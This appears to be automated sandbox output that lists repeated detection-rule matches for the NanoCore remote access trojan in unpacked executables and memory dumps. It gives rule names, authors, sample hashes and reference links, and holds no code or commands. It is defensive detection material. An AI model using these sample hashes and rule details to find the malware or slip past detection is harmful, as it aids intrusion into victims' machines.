      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
